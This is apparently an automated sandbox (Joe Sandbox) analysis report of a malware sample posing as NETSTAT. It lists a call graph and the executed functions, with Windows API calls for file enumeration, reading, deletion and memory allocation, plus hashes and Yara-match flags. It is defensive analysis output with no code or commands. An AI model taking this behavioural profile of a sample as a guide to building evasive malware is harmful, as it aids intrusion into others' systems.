34470->34467 34471 bde320 2 API calls 34470->34471 34472 bdad62 34471->34472 34472->34412 34474 bd6f50 10 API calls 34473->34474 34475 bd3226 34474->34475 34476 bd3233 34475->34476 34477 bd6f50 10 API calls 34475->34477 34476->34425 34478 bd3244 34477->34478 34478->34476 34479 bd6f50 10 API calls 34478->34479 34480 bd325f 34479->34480 34481 bde320 2 API calls 34480->34481 34482 bd326c 34481->34482 34482->34425 34483->34430 34484->34429 34485->34438 34486->34449 34487->34450 34488->34454 34490 bd2cc9 34489->34490 34491 bd7360 LdrLoadDll 34490->34491 34492 bd2d00 34491->34492 34493 bd7360 LdrLoadDll 34492->34493 34494 bd2d18 34493->34494 34495 bd7360 LdrLoadDll 34494->34495 34497 bd2d34 34495->34497 34496 bd2dbc 34496->34195 34497->34496 34498 bd2d5e FindFirstFileW 34497->34498 34498->34496 34502 bd2d79 34498->34502 34499 bd2da3 FindNextFileW 34501 bd2db5 FindClose 34499->34501 34499->34502 34501->34496 34502->34499 34503 bd2b80 13 API calls 34502->34503 34503->34502 34504->34241 34506 bce778 34505->34506 34507 bce780 34505->34507 34506->34247 34508 bdabb0 3 API calls 34507->34508 34509 bce793 34508->34509 34509->34506 34510 bcaf40 LdrLoadDll 34509->34510 34511 bce81d 34510->34511 34512 bcaf40 LdrLoadDll 34511->34512 34513 bce82e 34512->34513 34513->34247 34515 bcf817 34514->34515 34516 bd7360 LdrLoadDll 34515->34516 34517 bcf8c6 34516->34517 34518 bcfa3f 34517->34518 34519 bcf8d1 GetFileAttributesW 34517->34519 34518->34247 34519->34518 34520 bcf8e3 34519->34520 34520->34518 34521 bce340 10 API calls 34520->34521 34523 bcaf40 LdrLoadDll 34520->34523 34524 bd3210 10 API calls 34520->34524 34527 bdaa50 34520->34527 34531 bda8e0 11 API calls 34520->34531 34532 bda780 11 API calls 34520->34532 34521->34520 34523->34520 34524->34520 34528 bdaa66 34527->34528 34530 bdab66 34527->34530 34529 bd6f50 10 API calls 34528->34529 34528->34530 34529->34528 34530->34520 34531->34520 34532->34520 34534 bd0845 34533->34534 34535 bcaf40 LdrLoadDll 34534->34535 34536 bd08aa 34535->34536 34537 bcaf40 LdrLoadDll 34536->34537 34538 bd08f8 34537->34538 34539 bce300 2 API calls 34538->34539 34540 bd093f 34539->34540 34541 bd0946 34540->34541 34542 bdabb0 3 API calls 34540->34542 34541->34255 34544 bd0954 34542->34544 34543 bd095d 34543->34255 34544->34543 34545 bcaf40 LdrLoadDll 34544->34545 34548 bd09ac 34545->34548 34546 bce340 10 API calls 34546->34548 34547 bdaa50 10 API calls 34547->34548 34548->34546 34548->34547 34550 bd0a31 34548->34550 34572 bcff60 34548->34572 34551 bce340 10 API calls 34550->34551 34553 bd0a89 34550->34553 34583 bd02c0 34550->34583 34551->34550 34554 bde320 2 API calls 34553->34554 34555 bd0a90 34554->34555 34555->34255 34557 bd0521 34556->34557 34558 bd0516 34556->34558 34560 bce760 3 API calls 34557->34560 34559 bde400 2 API calls 34558->34559 34559->34557 34570 bd0530 34560->34570 34561 bd0537 34561->34257 34562 bce300 2 API calls 34562->34570 34563 bd07f0 34564 bd0809 34563->34564 34565 bde320 2 API calls 34563->34565 34564->34257 34565->34564 34566 bce340 10 API calls 34566->34570 34567 bdaa50 10 API calls 34567->34570 34568 bcaf40 LdrLoadDll 34568->34570 34569 bcff60 11 API calls 34569->34570 34570->34561 34570->34562 34570->34563 34570->34566 34570->34567 34570->34568 34570->34569 34571 bd02c0 10 API calls 34570->34571 34571->34570 34573 bcff86 34572->34573 34574 bd6f50 10 API calls 34573->34574 34575 bcffe2 34574->34575 34576 bd3210 10 API calls 34575->34576 34577 bcffed 34576->34577 34579 bd0170 34577->34579 34581 bd000b 34577->34581 34578 bd0155 34578->34548 34579->34578 34580 bcfe30 11 API calls 34579->34580 34580->34579 34581->34578 34589 bcfe30 34581->34589 34584 bd02e6 34583->34584 34585 bd6f50 10 API calls 34584->34585 34586 bd0357 34585->34586 34587 bd3210 10 API calls 34586->34587 34588 bd0362 34587->34588 34588->34550 34590 bcfe46 34589->34590 34593 bd3680 34590->34593 34592 bcff4e 34592->34581 34594 bd36bd 34593->34594 34595 bd376d 34594->34595 34596 bd4660 11 API calls 34594->34596 34597 bd3710 34594->34597 34595->34592 34596->34597 34598 bd3749 34597->34598 34599 bde320 LdrLoadDll RtlFreeHeap 34597->34599 34598->34592 34599->34598 34600->34046 34601->34057 34602->34055 34603->34049 34604 bc7af0 34605 bc7b15 34604->34605 34606 bdc120 LdrLoadDll 34605->34606 34607 bc7b5f 34606->34607 34608 bc7b69 34607->34608 34609 bc7bea 34607->34609 34610 bdc310 2 API calls 34607->34610 34650 bce030 LdrLoadDll NtClose 34609->34650 34611 bc7b8d 34610->34611 34611->34609 34613 bc7b98 34611->34613 34615 bc7c16 34613->34615 34637 bcbd40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34613->34637 34614 bc7c05 34616 bc7c0c 34614->34616 34617 bc7c22 34614->34617 34619 bdc8a0 2 API calls 34616->34619 34651 bdc1a0 LdrLoadDll 34617->34651 34619->34615 34620 bc7bb2 34620->34615 34638 bc7920 34620->34638 34622 bc7c4d 34652 bcbd40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34622->34652 34626 bc7c6d 34626->34615 34653 bdc1d0 LdrLoadDll 34626->34653 34628 bc7c92 34654 bdc260 LdrLoadDll 34628->34654 34630 bc7cac 34655 bdc230 LdrLoadDll 34630->34655 34632 bc7cbb 34633 bdc8a0 2 API calls 34632->34633 34634 bc7cc5 34633->34634 34656 bc76f0 13 API calls 34634->34656 34636 bc7cd9 34637->34620 34639 bc7936 34638->34639 34657 bdbc40 34639->34657 34641 bc7ac1 34642 bc794f 34642->34641 34678 bc7500 10 API calls 34642->34678 34644 bc7a35 34644->34641 34679 bc76f0 13 API calls 34644->34679 34646 bc7a63 34646->34641 34647 bdc310 2 API calls 34646->34647 34648 bc7a98 34647->34648 34648->34641 34680 bdc910 LdrLoadDll 34648->34680 34650->34614 34651->34622 34652->34626 34653->34628 34654->34630 34655->34632 34656->34636 34658 bde400 2 API calls 34657->34658 34659 bdbc57 34658->34659 34681 bc9250 34659->34681 34661 bdbc72 34662 bdbca7 34661->34662 34663 bdbc93 34661->34663 34666 bde2a0 2 API calls 34662->34666 34664 bde320 2 API calls 34663->34664 34665 bdbc9d 34664->34665 34665->34642 34667 bdbd0e 34666->34667 34668 bde2a0 2 API calls 34667->34668 34669 bdbd27 34668->34669 34673 bdbff2 34669->34673 34687 bde2e0 LdrLoadDll 34669->34687 34671 bdbfd7 34672 bdbfde 34671->34672 34671->34673 34674 bde320 2 API calls 34672->34674 34676 bde320 2 API calls 34673->34676 34675 bdbfe8 34674->34675 34675->34642 34677 bdc047 34676->34677 34677->34642 34678->34644 34679->34646 34680->34641 34682 bc9275 34681->34682 34683 bcabf0 LdrLoadDll 34682->34683 34684 bc92a8 34683->34684 34685 bcc770 3 API calls 34684->34685 34686 bc92cd 34684->34686 34685->34686 34686->34661 34687->34671 34688 35d9540 LdrInitializeThunk 34690 bdb440 34691 bde2a0 2 API calls 34690->34691 34693 bdb47b 34690->34693 34691->34693 34692 bdb576 34693->34692 34694 bcabf0 LdrLoadDll 34693->34694 34695 bdb4bb 34694->34695 34696 bd7360 LdrLoadDll 34695->34696 34698 bdb4da 34696->34698 34697 bdb4f0 Sleep 34697->34698 34698->34692 34698->34697 34701 bdb0b0 LdrLoadDll 34698->34701 34702 bdb290 LdrLoadDll 34698->34702 34701->34698 34702->34698

                                          Executed Functions

                                          Function 00BD2CA0 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 00BD2D6F
                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 00BD2DAE
                                          • FindClose.KERNELBASE(?), ref: 00BD2DB9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: cc032a7772c4140533036cf3b1a79082cead9a9b4a02419c26da5f70b1f6b180
                                          • Instruction ID: b0a7e6c54dd9bceb8f0184ef2dc61b2e17916ab29cc40d1659064396ee91f3ac
                                          • Opcode Fuzzy Hash: cc032a7772c4140533036cf3b1a79082cead9a9b4a02419c26da5f70b1f6b180
                                          • Instruction Fuzzy Hash: B43194719003486BDB20DF64CC85FEFB7BDEF54715F144499B909A7280F670AA84CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC8CA Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtDeleteFile.NTDLL(00BD7082,00000206,?,00BD7082,00000005,00000018,?,?,00000000,00000206,?), ref: 00BDC895
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 25d74192eeca7f9acee8072f72e44533445d5372083b4cd18595bce7331ba3e3
                                          • Instruction ID: 828736c1d4c0f7d824129bab9b4c65a0643b08a6ef6b4689bf356da1303cceb6
                                          • Opcode Fuzzy Hash: 25d74192eeca7f9acee8072f72e44533445d5372083b4cd18595bce7331ba3e3
                                          • Instruction Fuzzy Hash: F1016DB6240104AFDB10DF98DC85FEB7BA9EF88750F11865AFA1D97381D631E911CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC76A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,00BD70BC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00BD70BC,00000000,00000005,00000060,00000000,00000000), ref: 00BDC7BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction ID: de3efba5e2582ee16b1fc3163c6cd0d92699373e88b70e4d22ca7a81f94b85b1
                                          • Opcode Fuzzy Hash: a078c3bf9d57d83358e91183a1e3254be38147f7c3a1d2eec9006c3564a7671c
                                          • Instruction Fuzzy Hash: 3601B6B2600108AFCB58CF98DC85EEB77E9EF8C754F118259BA0DD7241D630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC770 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,00BD70BC,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00BD70BC,00000000,00000005,00000060,00000000,00000000), ref: 00BDC7BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction ID: 80272f3aaa511cb6b8ce40d74d666ceabe217fb8b3def21cb321ec50ea2e8889
                                          • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                          • Instruction Fuzzy Hash: 2EF07FB2215208AFCB58DF99DC85EEB77EDAF8C754F118248BA0D97241D630F851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC820 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(00BD7280,00BD255C,FFFFFFFF,00BD6D6A,00000206,?,00BD7280,00000206,00BD6D6A,FFFFFFFF,00BD255C,00BD7280,00000206,00000000), ref: 00BDC865
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction ID: eaabaa48d647b938c118b959ecb2d187c63b4f2fed2a305c3bd645744ff6158b
                                          • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                          • Instruction Fuzzy Hash: A5F0AFB2200208ABCB14DF89DC85EEB77ADAF8C754F118249BA4DA7241D630E811CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC94C Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BC2D11,00002000,00003000,00000004), ref: 00BDC989
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction ID: 398cb52d860de784de715d6efad27d57dd054a9bb0290666c22fe83a7a550779
                                          • Opcode Fuzzy Hash: 5963d8c5123dac3d58657db6fefd9ffd8b71426ea0f2c56084ddf82e0e0f09d0
                                          • Instruction Fuzzy Hash: 69F01CB5200158AFCB14DFA9DC81EEB7BADAF8D350F158249FE4997242C630E811CBB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC950 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00BC2D11,00002000,00003000,00000004), ref: 00BDC989
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction ID: ddcfc7cacb532f92dba35089e6bedfd26b86b7e98af04349a9228df3e0154957
                                          • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                          • Instruction Fuzzy Hash: 45F015B2200208ABCB18DF89DC81EAB77ADAF88750F018249BE0997241C630F810CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC8A0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(00BD725E,00000206,?,00BD725E,00000005,FFFFFFFF), ref: 00BDC8C5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction ID: c757b5a69c8c58a16cbc441d03d71ea4f9bcd38547dc66e5c33e64a488f3f46f
                                          • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                          • Instruction Fuzzy Hash: 9DD01772240214ABD614EBA8DC89E9B7BACDF48660F014195BA4D5B282D630FA008AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC870 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtDeleteFile.NTDLL(00BD7082,00000206,?,00BD7082,00000005,00000018,?,?,00000000,00000206,?), ref: 00BDC895
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                          • Instruction ID: 994be71c8b0daf8539bd08d373df5f2bb3f6cf1d4f70e955ec0299d52d34aba7
                                          • Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                          • Instruction Fuzzy Hash: 25D01772240214ABD710EB98DC89E977BACEF48760F114599BA4D5B282D630FA008BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDC89A Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(00BD725E,00000206,?,00BD725E,00000005,FFFFFFFF), ref: 00BDC8C5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction ID: 12c6cf97fe5b5ebe3b0a2a7ebff2fb4bf34aa36adbf97b393f4b0ba105b76183
                                          • Opcode Fuzzy Hash: 777f6a8e1023c543128c3ec3fc07f0c36be24b25318d8d8fb6fb8c16991747f5
                                          • Instruction Fuzzy Hash: 2AE0C2A64093C04FC721EB7894C008ABF54DF9212872555CFE4955B643D161A216DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9d45e6be7bcc92973fc648254fd6195200d9e85fe01b76170155d128317054c8
                                          • Instruction ID: 49fa7feb8bd96f22d0a5e68e65f4aa52752d77b7b3fd297f515b547d1b97f59a
                                          • Opcode Fuzzy Hash: 9d45e6be7bcc92973fc648254fd6195200d9e85fe01b76170155d128317054c8
                                          • Instruction Fuzzy Hash: D290026135185446D204A5695C14B170095A7D0383F51C115A4184555CCA5588616561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 426d38a08e29e15eeec1bd86ee8fbe101b15e9198ab075dd784cd807b07ee50e
                                          • Instruction ID: 74da9bbd58f7d8a267b6a6ff0b603690da84a7cd1a59a19db258123ac77a6969
                                          • Opcode Fuzzy Hash: 426d38a08e29e15eeec1bd86ee8fbe101b15e9198ab075dd784cd807b07ee50e
                                          • Instruction Fuzzy Hash: CC9002B134105806D144B15954047560095A7D0381F51C011A9094555E87998DD576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 35572add0927ad9653a16dbca3cca8862b761d550a98de1c92f2b5cfdbf0c159
                                          • Instruction ID: ead3be871cfc7256eba5a74f0d8a98abb168da275a4cb82ff551e6ca702e92d5
                                          • Opcode Fuzzy Hash: 35572add0927ad9653a16dbca3cca8862b761d550a98de1c92f2b5cfdbf0c159
                                          • Instruction Fuzzy Hash: EC9002A138105846D104A1595414B160095E7E1381F51C015E5094555D8759CC527166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e3df0c490e2e50265baefcdba811b6893c87bc3ed6a1fbeeb47eff6acebefe56
                                          • Instruction ID: d8234940cbbdf8265f68fc4fac53d3efa7696fafcac7df240b183a8ba77e9020
                                          • Opcode Fuzzy Hash: e3df0c490e2e50265baefcdba811b6893c87bc3ed6a1fbeeb47eff6acebefe56
                                          • Instruction Fuzzy Hash: 1B900261382095565549F15954045174096B7E02C1791C012A5444951C86669856E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e872d369cfd2e48792e45115788944a36dcc5389200032b09e339864100e2c3a
                                          • Instruction ID: 5e9ef17f3c4c359a183b5eb836cb5a517f4d3cd2a3ccec0ef1a757458bbdae36
                                          • Opcode Fuzzy Hash: e872d369cfd2e48792e45115788944a36dcc5389200032b09e339864100e2c3a
                                          • Instruction Fuzzy Hash: AC90027134105817D115A15955047170099A7D02C1F91C412A4454559D97968952B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 48848db3e3d363dca3d764388d7b3f542f3b61c062784c17745e72a0b11eee43
                                          • Instruction ID: 187378f7541ba05ed339dfc6b2a0d8d254e36c777f449a4d68ab8067b99de979
                                          • Opcode Fuzzy Hash: 48848db3e3d363dca3d764388d7b3f542f3b61c062784c17745e72a0b11eee43
                                          • Instruction Fuzzy Hash: 3A90027134105806D104A59964086560095A7E0381F51D011A9054556EC7A588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c97e8318649d4cb798070315350140600c2e9fbc7b05583bf175ff017829a674
                                          • Instruction ID: 61ab88816a8da4a430b19ed8218796edf6e427d4bd0e23f6be18f44697fc4233
                                          • Opcode Fuzzy Hash: c97e8318649d4cb798070315350140600c2e9fbc7b05583bf175ff017829a674
                                          • Instruction Fuzzy Hash: CA90027135119806D114A15994047160095A7D1281F51C411A4854559D87D588917162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c2b8556ea47ff71473e909a6efebe47fbc95c51b67fece74fe5d9e3bf4412157
                                          • Instruction ID: 55fd8d4cb1687dff9bc202b238b4340e57562cca621b9efb7d1b5d82b86d2566
                                          • Opcode Fuzzy Hash: c2b8556ea47ff71473e909a6efebe47fbc95c51b67fece74fe5d9e3bf4412157
                                          • Instruction Fuzzy Hash: 0E90026935305406D184B159640861A0095A7D1282F91D415A4045559CCA5588696361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
